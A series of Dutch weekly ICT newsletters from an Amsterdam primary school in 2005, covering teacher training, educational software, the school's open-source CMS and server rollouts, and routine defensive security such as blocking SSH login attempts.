Even ter info: als je alle verloren gegane data (leerling-, personeels-, financiële administratie, toetsgegevens en voorschool opnieuw zou moeten (laten) invoeren, kost dat ongeveer net zoveel als een middenklasse auto. Maar je zult nooit alles terugkrijgen. Oude gegevens uit het leerlingvolgsysteem kun je meestal niet meer uit je herinnering reconstrueren.

Site@School

Knallende kurken in het S@S kantoor. Zaterdag 21 mei bestaat S@S 1000 dagen. Dank allen voor jullie bijdragen die dit CMS tot het basisschool CMS maakten.

Voor de statistiek:
Totaal aantal hits: 219,122
Totaal aantal downloads: 18,686
Aantal posts in het forum: +3200
Aantal antwoorden van Fred: 1000 (ook deze week bereikt)

Bulgaars
We ontvingen van Stefan (leraar te Bulgarije) de Bulgaarse vertaling van S@S. Daarmee komt het aantal talen op 16.

Het 'handleiding correctie' project dat de kinderen van een basisschool in Florida uitvoerden, loopt op zijn eind. Ze hebben honderden kleine en grote fouten uit alle hoofdstukken gehaald. Typefoutne verkeerd woordgebruik ( 'amount' i.p.v. 'number'), fouten in meervoud ('the pupils en 'the pupils' books) etc. Soms interessante discussies (you are opening a can of wurms!). De kwaliteit van het manual is er enorm op vooruitgegaan.

Het developers manual begin ook het punt te naderen dat beschreven is wat de interne structuur van S@S is en wat alle scripts doen. Deze enorme klus komt geheel voor rekening van Fred. Het is interessant om eens te kijken op:
http://siteatschool.sourceforge.net/index.php?section=13&page=60
We zeggen het nog maar eens duidelijk (wie pakt de handschoen op?): Wij kennen geen OSS project dat zo volledig gedocumenteerd is, met een:
- Handleiding voor gebruikers.
- Handleiding voor ontwikkelaars.
- Richtlijnen voor het schrijven van een handleiding.
- Richtlijnen voor het schrijven van code.

We horen graag van andere OSS projecten die dit alles ook hebben.
We steken er graag wat van op.

groeten en prettig weekend
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-05-27 w21

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 21 - 2005 (27 mei)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Media Player

Om de filmpjes op Beeldbank te bekijken moet je een geavanceerde versie van Media Player of Real Player hebben. Zo worden we gedwongen om met de grote jongens mee te doen. Jammer.
(Voor de techniek lees ook onderaan)

Ict scholing

Deze week hebben we in onze scholing geëvalueerd of de registratie bevalt (van wat de leerlingen moeten doen en moeten kunnen). Daarover zijn wat afspraken gemaakt. Ook is er afgesproken dat er in juni klassenconsulten zullen plaatsvinden. Jan zal op één ochtend in de groepen 3, 4 en 5 o.a. kijken hoe de organisatie verloopt.

Ouderhulp

In groep 5 is er een ouder gevonden die helpt bij het aanleren van vaardigheden op gebied van Paint en Word. Ze neemt steeds een groepje van 6 leerlingen onder haar hoede. Wat een uitkomst!

Printers

Eén van onze (kado gekregen) laserprinters printte te bleek. Gelukkig hadden we bij de printers ook nog gedeeltelijk gebruikte cartridges gekregen, dus hoefden we nog geen €140.- uit te geven voor een nieuwe.

TECHNISCH

Site@School

Het aftellen is begonnen...(voor de nieuwe release van 31 mei)
Florida legde de laatste hand aan het manual. Het is nu te bekijken op:
http://wyxs.net/mansas/man2.3/

ServerAtSchool

Peter en Dirk waren deze week bezig op 'de Ark' in Buitenveldert. Installatie en uitrol gaan voorspoedig, gedegen maar een beetje langzaam.
Om die reden beraden we ons over de wijzen van begroten van de installatiekosten.
De Windows Media Player die we nodig hebben voor Digiwijzer, om schooltv-beeldbank te bezoeken komt niet door de firewall heen. Poort 554 en 1755 moeten daarvoor open. Peter werkt eraan.

We zijn druk (afscheid collega’s), dus is er niet veel te biccen.

groeten en prettig weekend.
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-06-03 w22

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 22 - 2005 (3 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Maatwerk

Deze week hadden we een scholing om het programma Maatwerk te leren begrijpen. Omdat het programma bedoeld is voor leerlingen die echt erg uitvallen met rekenen waren alleen de Ib-ers, RT-ers, de rekenspecialist en de ICT coördinator aanwezig.
De bijeenkomst was niet erg bevredigend, omdat het programma blijkbaar de nieuwste versie was en de begeleider daar niet van op de hoogte was. Dit wordt nog vervolgd!!

Mappen kwijt.

Deze week waren twee leerlingen opeens hun map (mijn documenten) kwijt In het ene geval had een leerling de map versleept naar een map van een medeleerling. Het andere geval is nog niet opgelost. Een hoop gepuzzel.

Ouderhulp

De moeder die helpt in groep 5 met de Word en Paint vaardigheden helpt nu ook de leerlingen van groep 4. Wat fijn, dat er ouders hiertoe bereid zijn.

Project groep 3

Er is een nieuwe feature in SiteAtSchool. Leerlingen werken samen aan een project, of een thema. In groep 3 zijn we begonnen om de teksten die de kinderen moeten typen in zo’n project te verzamelen. Er is een klein beginnetje gemaakt: http://www.rosaboekdrukker.net/index.php?section=4&page=729&student=396

Media Player, Real Player

Het is heel prettig te merken, dat naar aanleiding van deze nieuwsbrief meegedacht wordt aan oplossingen. Naar aanleiding van onze klacht vorige week over het bekijken van filmpjes op de site van BEELDBANK hebben we een tip gekregen -van onze zeer gewaardeerde BIC lezer Dennis- voor een andere “Player”, http://www.free-codecs.com/download/Real_Alternative.htm We weten nog niet of ie werkt omdat er nog aan het openzagen van de poorten in de firewall wordt gewerkt. We houden je op de hoogte.

Evaluatie begeleiding groepen 6, 7 en 8

Deze week hebben we de klassenconsulten van de bovenbouw nabesproken met de OBD. Naar aanleiding daarvan hebben we bekeken hoe we volgend jaar verder zullen gaan. Het accent komt te liggen op het TAALASPECT: hoe maak je een werkstuk? Wat wordt er aangeboden in onze methode (Taalleesland)
Eind mei moesten de aanvragen voor de scholingen van het komende schooljaar ingediend worden. Dat isnu gebeurd.

Themabijeenkomst

Op 28 juni is er een themabijeenkomst 'Leren vernieuwen met ICT'. Meer informatie hierover is te lezen op de site van stampei. http://www.edu.amsterdam.nl/STAMPEI/CORE/00/24/31.HTML
Er staan heel interessante onderwerpen op het programma. (o.a. project Vision en Kennisrotonde)

Nieuwsbrief Leerling-zorg

De nieuwsbrief over leerling-zorg van Kennisnet van de maand juni is uit. Lees en huiver: http://e-zine.kennisnet.nl/index.php?section=titels&action=view&archive_id=382
Een eigen abonnement erop is natuurlijk ook mogelijk.

Looptelefoon

Eindelijk heeft de ICT afdeling een handsfree looptelefoon met oortelefoon, waardoor je anderen niet stoort. Dat is handig voor helpdesk contacten. Zo heb je je handen vrij om te typen of op aanwijzingen van een deskundige iets uit te voeren. Wij van ServerAtSchool vinden 't ding eigenlijk een voorwaarde voor een ICT'er. Nu nog uitzoeken hoe je de koptelefoon uit opgestoken haren gemakkelijk kunt losmaken. Bij Karin slaagde Dirk daar alleen in door het haar los te knippen.

Release Site@School 2.3!

Afgelopen zondag (twee dagen eerder dan gepland) was de release. Iedereen blij, Fred en Dirk aan de drank.

Migratie Site@School 2.2 > 2.3

Probleemloze migratie gehad deze week. Fred was standby maar hoefde niet in actie te komen.

ServerAtSchool

Peter rondde deze week de installatie van SAS op 'De Ark' in Buitenveldert af. Daar hebben ze nu 30 werkstations en alles lijkt naar tevredenheid te draaien.

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-06-10 w23

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 23 - 2005 (10 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Reservering scholingsgelden ICT

Volgende week maken we ICT scholingen definitief. Het zijn nu nog concepten.

Letterpret

De kogel is door de kerk. Na de zomervakantie gaan we op zoek naar een nieuw kleuterprogramma. We zijn het zat: elke keer weer een obstakel. Het heeft twee jaar geduurd. Elke keer weer probeerden we een oplossing te vinden.
Ons advies: schaf nooit een programma aan, dat nog niet op veel scholen en in verschillende netwerken draait. En zeker geen programma dat eerst als stand-alone is gemaakt en daarna is aangepast voor een netwerk.
Het spreekt voor zich, dat rekeningen die Malmberg blijft sturen door ons nimmer betaald zullen worden. We wachten nog steeds op een schadevergoeding hunnerzijds.

Norton virusscanner via APS,

We hebben het contract opgezegd. Nooit meer nodig. Besparing op jaarbasis EUR 200. Met dank aan ServerAtSchool en ClamAV.

TECHNISCH (Site&Server@school)

Site@School

We kregen mail van Pablo Torres van het MediaLab Teilhard de Chardin, Colegio San Ignacio El Bosque, Santiago, Chile. Hij en enkele van zijn collega's willen de Spaanse versie gaan bijhouden en het manual in het Engels vertalen. WOW!!

TV module

Wat begon als een onschuldig script om een pagina op een TV bij de ingang te vertonen laat Fred (met dank aan Peter) uitgroeien tot een heftige module. Er zijn nu verschillende opties: één pagina vertonen, meerder pagina's achter elkaar vertonen, een pagina laten scrollen, een fotoalbum vertonen.
Het is ook mogelijk om in school meerdere TV's te hebben die ieder hun eigen pagina(s) vertonen. Dat is handig, bijvoorbeeld als de school meerdere ingangen heeft. Zo kan de ingang voor de onderbouw andere pagina's krijgen dan de rest van de school.
Verder zou je ook op de computers in de klas zaken kunnen vertonen.
Naar ons idee hebben we weer een absolute klapper in huis.
Bij ons werkt de TV module al een tijdje. Wie 'm wil zien; welkom. Bel maar voor een afspraak.

Bugfix

Er is een bugfix beschikbaar voor versie 2.3. Zie het Forum.

ServerAtSchool

Hopelijk de laatste hobbels genomen op de Ark. We leren weer vele wijze lessen. De belangrijkste: laat nooit een ander het basis-image maken! Hij/zij heeft een eigen (goede!) trukendoos, maar dat wil niet zeggen dat die trucs ook bij een SAS installatie werken.

Leerlingmappen

Opeens waren een paar leerlingen hun mappen kwijt. Ze waren snel en eenvoudig weer teruggezet, maar we weten nog niet waarom die leerlingen de mappen kwijtraakten. Gewist? Verplaatst? Bugje in Janitor? We houden het in de gaten.

WinSCP

Het programma waarmee op een veilige manier thuis gewerkt kan worden met de docs op de schoolserver is nu ook in een Nederlandstalige versie beschikbaar. Download v. 3.7.5 beta op:
http://winscp.net/eng/index.php Neem de multilingual version.

Tot zover maar weer, groet en prettig weekend,
Karin, Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-06-17 w24

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 24 - 2005 (17 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Maatwerk rekenen

De afgesproken scholing over het remediërende programma Maatwerk zullen we na de zomervakantie opnieuw doen. Er ging iets vreselijk mis aan de kant van de begeleidingsdienst. Gelukkig werd de fout toegegeven en pakken we het na de vakantie met frisse moed weer op.
We zijn deze week ook even gaan kijken op de Joop Westerweelschool hoe ze daar met Maatwerk werken. Altijd leuk om bij een ander te kijken. (ze werken ook met server-op-school)

Scholingsafspraken

Deze week hebben we een plan gemaakt voor het komende schooljaar. Wat we ervoor nog nodig hebben is te weten hoeveel scholing je aan leerkrachten verplicht kunt stellen. In de normjaartaak zit per aanstelling een verplicht aantal uren. Daar moeten we rekening mee houden bij de vaststelling van ons traject.

Letterpret

Nu we hebben besloten om het programma niet meer te gebruiken, moeten we op zoek naar een nieuw kleuterprogramma. Volgend jaar gaan we eerst om de tafel zitten met de betrokken bouw om te kijken aan wat voor soort programma het meest behoefte is: een woordenschat programma of een programma dat beantwoordt aan ontluikende geletterdheid

TECHNISCH

HULP GEVRAAGD

Al enige jaren werkt Barry Faas aan 'programmeer'-gereedschap waarmee op een makkelijke manier educatieve programma's gemaakt kunnen worden. Met dit programma 'Edukitty' won Barry twee jaar gelden de Linux-Magazine programmeerwedstrijd.
Het werk aan het programma is nu zover dat hij moet kiezen welke standaard hij neemt voor het grafisch werk. Zijn voorlopige keuze is OpenGL:
http://www.sgi.com/products/software/opengl/
Zijn vraag is of de tamelijk eenvoudige computers in het onderwijs goed kunnen omgaan met OpenGL.
Wij willen hem graag helpen en vragen jullie het volgende:
Wil je een testje doen op je verschillende computers en de resultaten mailen aan Barry. De test is supereenvoudig en duurt minder dan 5 minuten.
Ga naar:
http://wyxs.net/gltest . Daar vind je het programma: gltest.exe. Download gltest.exe en draai het programma. Het bestandje pakt zichzelf uit in een map 'gltest' In de map zit gltest32.exe. Doe het testje (figuurtjes op je scherm) door gltest32.exe uit te voeren.
In de map 'gltest' vind je een bestandje 'results.txt'. Daarin staan de resultaten van de test. Leuk om te lezen. Mail dit bestandje als bijlage naar Barry: gltest@tux.demon.nl . Het mailadres staat ook onderin het bestandje 'results.txt'.
Dat is alles. Het programma doet niets met je computer of met het register.
Namens Barry en alle toekomstige gebruikers van Edukitty, zeer bedankt!

ServerAtSchool

Deze week stond in het teken van obs 'de Opslach' in Franeker. De school was dicht wegens vakantie. Peter, Matthijs en Dirk hebben hard gewerkt aan de uitrol. Die verliep probleemloos en we liggen prima op schema. Maandag verder.

Site@School

De TV module werkt prima en John, onze conciërge, houdt de pagina's met mededelingen bij. Het prettige van S@S toegangsbeheer is dat hij 1 sectie en 1 module mag gebruiken.
John: "Makkelijk te doen. Gisteren heb ik ook de foto's van het bezoek aan de minister via de tv laten zien". (groep 8 heeft een prijs gewonnen via het tijdschrift Sam Sam)

S@S gebruikers.

Neem eens een kijkje op andere sites die met S@S gemaakt zijn!!! http://siteatschool.sourceforge.net/index.php?section=6&category=&page=10&PHPSESSID=b7d6742ef830d68471d1dc6cd3f7532f
Het worden er steeds meer!!!

Manuals en handleidingen

Manuals

We zoeken nog steeds vertalers voor de vertaling van de Users' Guide naar het Nederlands. Help mee en doe een paar hoofdstukken!

Handleidingen

Tevens zouden we graag in contact komen met leerkrachten die:
- S@S zeer goed in de vingers hebben en
- ervaring hebben in het lesgeven in S@S aan leerlingen en leerkrachten, om
- handleidingen te schrijven voor leerlingen en leerkrachten.
Het betreft hier werk waar een vergoeding tegenover staat.
De handleidingen zullen onder de LGPL licentie beschikbaar komen.

S@S wordt echt getest!

Het testen van S@S gebeurde tot nu toe door goedwillende amateurs en de gebruikers. Daar komt verandering in!
Stagiair Martin (hij maakte het foto album voor S@S) heeft nu een baan als professioneel tester van software. Hij mag het testen leren op een proefproject en koos S@S!
Zeer bedankt Martin, S@S kan wel een echte tester gebruiken, maar over de amateurs natuurlijk niets dan goeds. Hun werk blijft nodig. Zolang er insecten zijn, zullen wij leven met bugs.

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-06-24 w25

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 25 - 2005 (24 juni)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Evaluatie

Elk jaar evalueren wij ons onderwijs en onze organisatie. Dat deden we afgelopen donderdag. ICT kwam ook aan de orde. Het scholingsbeleid voor het komende schooljaar werd uitgelegd aan de hand van wat we het afgelopen jaar hebben bereikt. Het beoogde doel was nog niet gehaald en daar moet dus nog aan gewerkt worden door middel van begeleiding/klassenconsulten, extra scholing en regelmatige evaluaties in de planningskalender. Het doel is in ons ICT beleidsplan als volgt geformuleerd: “De leerkrachten moeten aan het einde van schooljaar 2004 – 2005 zelfstandig kunnen omgaan met het uitgestippelde ICT traject op gebied van eigen ICT vaardigheden en onderwijskundige toepassingen.” Bij ons op school ligt het probleem bij ZELFSTANDIG. Want de organisatie van de uitgestippelde lijn is nog niet zo eenvoudig.

Foto’s op de website

Ons fotoalbum op de website moet nodig gereorganiseerd worden. Het wordt vol en onoverzichtelijk. En ook schaffen steeds meer collega’s een digitale camera aan en willen de foto’s op de websites zetten. Hier moet beleid op gemaakt worden. Heeft iemand een idee?

TECHNISCH

MOODLE

Moodle is een OSS/GPL beheersysteem waar je je lessen in kan stoppen. Leerlingen kunnen de lessen volgen, maar ook opdrachten uitvoeren, overleggen met elkaar en nog veel meer. Je kunt het zo gek niet verzinnen of het zit er in.
Peter en Dirk bezochten de Open Schoolgemeenschap Bijlmer alwaar ze een demonstratie van Moodle kregen van Hans.
Wij twijfelden er aan of Moodle wel bruikbaar zou zijn binnen het _basis_onderwijs.
Die twijfel is weg. Het is een ongelofelijk doordacht syteem. Het probleem is dat je er tijd in moet stoppen om éénmalig je lessen in te voeren. Maar daarna...
(http://www.moodle.org)

SAS

De Opslach draait. Matthijs heeft nog wat afrondingsklusjes.
Nagekomen bericht: Hij kocht voor 30 euro 8 tweedehands printerservers. Die draaien prima. Hij kon zijn oude printers daardoor in gebruik houden voor de gehele school

S@S

Martin is aan het testen. Fred en Dirk worden bestookt met mails. De zaak wordt zeer grondig aangepakt.

MoonEdit

Dirk pakte een oud idee weer op: samenwerken op de computer. Dat is eigenlijk nooit van de grond gekomen. Bijvoorbeeld, dat je met twee mensen aan 1 tekst werkt. Raadpleging van de experts leverde geen antwoord op. Googlen wel.
Met MoonEdit kun je met maximaal 14 mensen aan een tekst werken; overal ter wereld. Het is echt verbluffend om het te zien.
http://moonedit.com/

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-06-28 w26

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 26 - 2005 (1 juli)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Klassenconsulten

Deze week werd in groep 3, 4 en 5 gekeken door onze OBD hoe de organisatie van de integratie van ICT plaatsvindt. De leerlingen werkten aan hun opdrachten. Maar niet alle kinderen. Wat deed de rest van de klas? Hoe moet je dat nou handig doen? In groep 3 wordt een weet-tekst overgetikt in Word. (zie: http://www.rosaboekdrukker.net/index.php?page=729&section=4)

In groep 4 maken de leerlingen een woord-veld, passend bij een taalthema in Paint. In groep 5 wordt gewerkt aan grotere kennis van Word volgens de methode “Digiwijs”. Binnenkort zullen de waarnemingen worden geëvalueerd in een groter gezelschap, zodat we er allemaal wat van kunnen leren.

Bijeenkomst “Leren vernieuwen met ICT

Deze middag werd georganiseerd door Stampei
Verslagen zijn te vinden via de volgende links:
http://www.stampei.nl/STAMPEI/CORE/00/24/31.HTML
http://www.ictopschool.net/samenwerking/nieuws/Nieuwsbericht.2005-06-30.4715
Iets nieuws voor het onderwijs was er niet te horen, als je een beetje de vakliteratuur en nieuwsbrieven bijhoudt. Wel was het natuurlijk erg interessant om van anderen te horen waar ze mee bezig zijn. Ook het netwerken met andere ICT coördinatoren is vaak inspirerend.
Veelgenoemde knelpunten waren de visie op ICT die nog te weinig ontwikkeld is, het feit dat ICT niet geïntegreerd en teveel “ hap snap“ is , te weinig tijd omdat er nog zoveel andere prioriteiten zijn, en de competenties van leerkrachten. Daadwerkelijk gebruik van ICT in het onderwijs vraagt nieuwe vaardigheden.

Webkwesties

Op de site http://www.webkwestie.nl/ staan allerlei vraagstukken die leerlingen op het internet moeten oplossen. We gaan er zeker een selectie uit maken die voor onze kinderen geschikt zijn om te doen. Als het gelukt is, zullen we er over publiceren.

TECHNISCH

LETTERPRET

Nu worstelt ook een andere school met Letterpret. Van onze speciale correspondent hoorden we dat Letterpret zich niet aan de EDEX standaard houdt. Dat claimen ze (malmberg) wel.

SERVERATSCHOOL

Didaktief
We staan in 'Didaktief'! Lees het stukje onder:
http://serveropschool.nl/index.php?section=2&page=45

De Opslach

Van Matthijs: "De migratie is geslaagd, de gebruikers hebben niets gemerkt. Het enige dat ze opviel is dat SAS logo aan het begin".

Inbraakpogingen 1

Peter werd licht gestoord van de inbraakpogingen op de server (op poort 22). Met deze poort is een versleutelde, dus zeer veilige, verbinding met de wereld mogelijk, bijvoorbeeld voor serveronderhoud. De poort wordt ook door de thuiswerkers gebruikt.
Voortdurend worden er hele lijsten met namen op losgelaten, om te kijken of de server ‘hapt'. Dit komt allemaal in de logfiles terecht, en moet dus allemaal onder ogen van mensen komen. (want de logfiles worden gecontroleerd)
Nu heeft Peter een effectief script dat deze onverlaten onmiddellijk blokkeert en hem met een lijstje op de hoogte brengt waar de boeven van afkomstig zijn.

Inbraakpogingen 2

Het Site@School support forum was deze week weer brandpunt van aanvallen omdat er een beveiligingslek in was gerapporteerd. Peter dichtte het. Kostte een halve dag, dus reken maar uit....
We worden dit forum zat en willen ervan af. Het is te populair en het beviel toch al niet. We zijn op zoek naar een ander forum.
Ter bestrijding van de kosten worden donaties op prijs gesteld. Wellicht moeten we uitwijken naar een andere provider.
Dirk heeft 92 forums onderzocht en werkt aan een shortlist waaruit we een keuze kunnen maken. Suggesties zijn welkom.

Site@School

Ook Fred is druk in de weer met beveiliging. S@S krijgt nu encrypted passwords wat de beveiliging enorm verbeterd. Het is een best ingewikkelde klus omdat er in S@S een feature zit waarbij je je password toegestuurd kan krijgen als je het vergeten bent.

KAPOTTE HARDWARE

Een harddisk van een van onze tweedehands computters ging stuk. Nieuwe oude harddisk erin, image terugzetten en daar ging ie weer.
Wij beginnen door te krijgen wat een aardig beleid zou zijn voor aanschaf van tweedehands computers: je koopt 10 % extra en die gebruik je voor de keer dat er wat stuk gaat. Je repareert niet eens een computer, je gooit 'm weg en neemt een andere van de stapel.

MONITOREN

We hebben prima 15 inch monitoren over van onze gemeentelijke dienst. Ze zijn identiek (en erg scherp van beeldkwaliteit – goed merk – 4 letters). Wij doen ze weg omdat we een partijtje 17 inch kregen. Snel reageren a.u.b.

Groet en goed weekend,
Karin, Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-07-08 w27

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 27 - 2005 (8 juli)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Letterpret

Deze week ontvingen we een GRATIS pakketje van Malmberg. Citaat uit de begeleidende brief:

”Sinds een jaar of meer werkt u met het programma Letterpret. Wij hopen natuurlijk dat dit naar volle tevredenheid verloopt. Sommige scholen hebben ons laten weten dat er technische problemen zijn met het computerprogramma. Om die reden hebben we het programma technisch compleet vernieuwd. Het programma voldoet aan de nieuwste technische eisen die computers vandaag de dag aan een programma stellen.
Naast de verbeterde techniek is het leerkrachtendeel opgezet volgens de Malmbergstandaard waardoor de leerlinggegevens uitwisselbaar zijn en u deze niet steeds opnieuw hoeft in de voeren.
Als gebruiker van Letterpret sturen we u deze nieuwe versie gratis toe zodat u met meer plezier en zonder technische problemen op de computer kunt oefenen in de voorbereiding op aanvankelijk lezen”

Ze geven nu openlijk toe, dat het geheel niet deugde!!! We zullen er een blik op laten werpen.

Intranet

Achter onze website www.rosaboekdrukker.net gaat nog een andere website schuil. Door op aanmelden te klikken en gebruikersnaam en wachtwoord in te voeren kom je op een afgeschermd gedeelte -het intranet- van de website. Je hebt dezelfde gegevens nodig als die van je webmail. In dat intranet, zullen de jaarplanning, het adv rooster en andere belangrijke mededelingen te vinden zijn. De lay-out is nog in een experimenteel stadium. Suggesties zijn altijd welkom.

Printen

Op de tweede verdieping bij ons op school zijn steeds problemen met printen. We hebben pas een netwerkprinter vervangen, en nu begint de volgende. Zou het kunnen zijn, dat het verkeer verstopt raakt in het netwerk, omdat er teveel printopdrachten worden gegeven? Het duurt namelijk even voordat een werkstuk is geladen in het geheugen van de printer. Ook moet de printer opwarmen. En... mensen zijn ongeduldig, waardoor er snel een volgend printcommando wordt gegeven. Zou dat het zijn? Het moet wel liggen aan de manier waarop ermee wordt omgegaan. Dezelfde printer op de 1e verdieping heeft dergelijk storingen nooit.

Ballonnenwedstrijd en topografie ONLINE

Vorige week vrijdag hielden we een ballonnenwedstrijd voor onze vertrekkende directeur, Agnes. Al op maandag werden gevonden kaartjes teruggestuurd. In de hal van onze school staat nu een landkaart met daarop de vindplaatsen van de kaartjes geprikt. Ze zijn in de achterhoek en in Duitsland gevonden. Met behulp van topografie-online konden we kleine dorpjes localiseren. http://www.bosatlas.nl/grote_bosatlas/online/goed.html Er staat wel vermeld, dat: Het gebruik van "Topografie Online" zal per 1 maart 2005 worden beëindigd. Maar de link doet het nog wel. Alleen als je Firefox als browser gebruikt moet er weer een plugin worden geïnstalleerd. Met Internet Explorer gaat het wel in één keer goed. Echt een superhandig snufje!!
zie ook www.rosaboekdrukker.net (klik op de foto)

T E C H N I S C H

SERVERATSCHOOL

Zoekgeraakte mappen

In SAS heeft iedere leerling zijn eigen map voor werkstukken, opdrachten, etc. Soms zijn mappen van kinderen verdwenen. Soms vinden we ze terug, soms niet.
We wisten wel een manier om de verloren mappen weer terug te halen (feature van SAS) maar het raadsel bleef. Hoe verdwijnen ze? Waar blijven ze?
'Gelukkig' hadden de Sterrewachters er ook last van. Zij vonden de oorzaak: Kinderen kunnen nog niet goed met de muis overweg en slepen soms hun map over een andere map heen. Als ze dan de muisknop loslaten, wordt de map verplaatst in de andere map. Zo komt Samira's map in die van Johan. Een heel gezoek om het weer goed te krijgen.
Eén en ander leidde tot een vraag aan Peter om uitbreiding op het bestaande feature: 'De automatische map herstel knop'. Nu moet de map nog met de hand worden teruggezet.

Logfiles

Onze systeembeheerder komt merkwaardige zaken tegen. Op computer 119 probeerde iemand een kinderchat te installeren en kort daarna probeerde iemand een MUD spel te spelen.
Ontbreekt het in die klas aan Internet toezicht?

QLICT

Peter en Dirk bezochten de Vondelschool. Ze hebben daar het systeem van de concurrentie: QLICT. Het werkt prima, ook met XP, maar vermoedelijk door closed source toepassingen.
Als je bij de concurrent kijkt, kun je je natuurlijk niet aan een oordeel onttrekken:
Prima systeem voor een school die weinig wensen heeft.

Voorzetramen

Op de Vondelschool waren we zeer getroffen door het gebruik van de platte LCD schermen, met een voorzetvenster. Ze hadden het met tweezijdig klevend plakband vast aan het beeldscherm gezet. En het werkte! In de klassen kon je de ballpointpunten op het plexiglas zien.
Ze waren wel weer veel geld kwijt aan de beveiliging met staalkabels.
Bedankt voor de prima avond Roelof!

Site@School

Encryptie
Fred is bezig met het veiliger maken van S@S. De wachtwoorden worden nu versleuteld opgeslagen.

Agenda
Er bleek nog een wensje voor de agenda in S@S: een knopje om snel terug te kunnen naar het intrAnet. Zit er in.
Kijk op http://wyxs.net/mansas/man2.4/mod_agen.html als in het manual wilt kijken hoe 't zit. Zeer vernuftig. Dank Fred voor de snelle oplossing!

S@S4US

We zijn allemaal druk met het kiezen van een nieuw forum. Er bleven van de 92 onderzochte fora 19 over. Na nader onderzoek bleven er 7 over. Na proefinstallaties bleven er 3 over. Daar werd door de testers over gestemd en het 'Simple Macnines Forum' kreeg de meeste stemmen tot nu toe. Peter en Fred bekijken de code en als die ook goed is, mag ie 't worden.
We experimenteren nu met migratie van phpBB2 naar SMF: de eerste resultaten zijn veelbelovend.
http://simplemachines.org

Tot zover,
Groet en goed weekend.
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT (info@rosaboekdrukker.nl)

2005-07-15 w28

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 28 - 2005 (15 juli)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT begeleiding 2005 - 2006

Deze week hebben we de afspraken over de begeleiding voor het komende schooljaar rondgemaakt. Nu rest nog om de data in het jaarrooster vast te leggen en dat is een klus. Er is heel veel geld mee gemoeid. De kosten bedragen wel 3x zoveel als voor het upgraden van ons computerpark. (maar dat doen we natuurlijk niet met nieuwe computers).

Website

Deze week zijn we druk geweest met verbeteringen en uitzoeken van mogelijkheden van onze website. Wie op het gele rechthoekje klikt in het logo van onze school krijgt het beeld te zien dat op de teevee in de hal vertoond wordt. Dit voor de mensen die vanuit thuis het mededelingenscherm bijwerken, en natuurlijk voor alle geïnteresseerden!
Ook zijn we bezig om onze weekagenda (DEZE WEEK genaamd) die we elke maandag in ons postbakje op school vinden en waar per weekend 3 emails aan gewijd worden, onder te brengen in de nieuwsbrievenmodule van het INTRANET. Hierover volgend jaar meer

SERVERATSCHOOL

Eindejaarsperikelen

We merken dat het einde van het schooljaar nadert. De bakcup schijf  van de server begint langzaamaan vol te lopen. Tijdens het vakantie onderhoud van de server pakken we dat klusje ook aan. Dan gaat de  server een dagje uit en spuiten we het stof uit ventilatoren en koellichamen om goede koeling te waarborgen. Ja, dit is een tip!
Tegelijkertijd zetten we een gigabit netwerkkaart in de server waardoor we een gigabit verbinding hebben tussen de server en de switches.
Uptime tot nu toe: 159 dagen.

cHELLo

Klachten van gebruikers: we kunnen niet girotellen en we kunnen niet bij de hotmail. Zoeken, zoeken, zoeken, niets te vinden. We belden onze provider UPC: Het probleem lag bij hen.
"Waarom zeg je dat niet op je site?", vroegen wij.
"Dat kunnen mensen niet lezen", zeiden zij.
Dat klopte niet, want het was een mailprobleem. Er klopte nog veel meer niet...
Lees verder en huiver, je gelooft je ogen niet:
http://www.berestijn.net/chello
Met dank aan Peter.
Dit alles speelde Donderdag. Vandaag belde meneer UPC. Rob (achternaam bij de redactie bekend) en zei dat het probleem was opgelost. Het was een kapotte kaart in een router.
Ik heb hem ook verwezen naar bovenstaande pagina. Hij kon hem helaas niet ontvangen en zou kijken waarom niet ....

Site@School

Klein foutje in de leerling login: leerlingen werden na 5 minuten inactiviteit uit Site@School gelogd. Gelukkig nog tijdens de les door Fred hersteld.
Hier begint zich een regel af te tekenen: op een school gaat alles veel langzamer. De toepassingen moeten niet stoppen na lange periodes van inactiviteit. Dat speelde ook al bij de webmail in het Berenproject.

Dit is de op één na laatste bic van dit schooljaar.
Volgende week een vakantiebic....

